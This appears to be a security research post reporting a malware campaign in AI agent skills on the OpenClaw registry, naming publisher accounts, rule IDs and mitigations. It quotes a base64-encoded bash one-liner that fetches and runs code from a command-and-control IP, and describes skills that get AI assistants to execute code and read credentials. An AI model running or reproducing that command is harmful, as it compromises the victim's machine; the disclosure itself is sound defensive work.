751 Malicious Skills Found on OpenClaw: Inside a Coordinated Supply Chain Attack
We scanned 56,480 AI agent skills on OpenClaw and found 751 distributing active malware. Three coordinated threat actors. Base64-encoded C2 callbacks. Password-protected zip files. The largest known AI agent supply chain attack.
TL;DR
A scan of 56,480 SKILL.md files on OpenClaw -- the largest AI agent skill registry -- found **751 skills (1.3%) distributing active malware**. At least three coordinated threat actors are mass-publishing poisoned skills disguised as legitimate developer tools. The payloads include password-protected zip files, base64-encoded shell commands, and direct C2 callbacks to IP `91.92.242.30`.
The Discovery
Between April 10-14, 2026, we scanned 96,096 AI agent skills and MCP server definitions across five public registries using ATR (Agent Threat Rules) v2.0.0 -- an open-source detection engine with 113 rules. OpenClaw returned the most alarming results: 751 skills contained active malware distribution instructions.
These were not theoretical risks. They were explicit attack payloads designed to compromise machines that install the skills.
The Attackers
**hightower6eu** published 354 skills, all malicious. Every skill -- Solana wallets, Google Workspace tools, Ethereum trackers -- requires users to download "openclaw-agent" as a password-protected zip (password: `openclaw`). The password bypasses antivirus scanning.
**sakaen736jih** published 212 skills, 198 malicious. Image generation tools that instruct macOS users to run:
echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -D | bashWhich decodes to: `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"` -- a direct callback to a command-and-control server executing arbitrary remote code on the victim machine.
**52yuanchangxing** published 137 skills, 99 malicious. Chinese-language business tools with similar attack patterns.
What This Means
AI agent skill registries are the new npm/PyPI -- and they are repeating the same supply chain security mistakes, with fewer safeguards. The difference: agent skills can instruct AI assistants to execute code, read credentials, and access filesystems without traditional sandboxing.
OpenClaw has 56,000+ skills. 1.3% are actively malicious. That is not a theoretical risk -- it is an active campaign.
Detection
ATR detected this campaign using deterministic regex-based pattern matching -- no LLM inference required. The scan of 56,480 skills completed in under 3 minutes. Rules that caught the attack: ATR-00121 (malicious code), ATR-00120 (prompt injection), ATR-00135 (exfiltration URLs), ATR-00162 (credential exfil combo), ATR-00163 (hidden override instructions).
What You Should Do
1. If you use OpenClaw skills: audit your installed skills with `npx agent-threat-rules scan`
2. Block C2 IP `91.92.242.30` at your network perimeter
3. Never run base64-encoded commands from skill installation instructions without decoding them first
4. Reject any skill that requires downloading password-protected archives
Full report with technical details: [github.com/Agent-Threat-Rule/agent-threat-rules](https://github.com/Agent-Threat-Rule/agent-threat-rules/blob/main/docs/research/openclaw-malware-campaign-2026-04.md)
---
*Detected by [ATR (Agent Threat Rules)](https://github.com/Agent-Threat-Rule/agent-threat-rules) -- the open detection standard for AI agent security. 113 rules. MIT licensed.*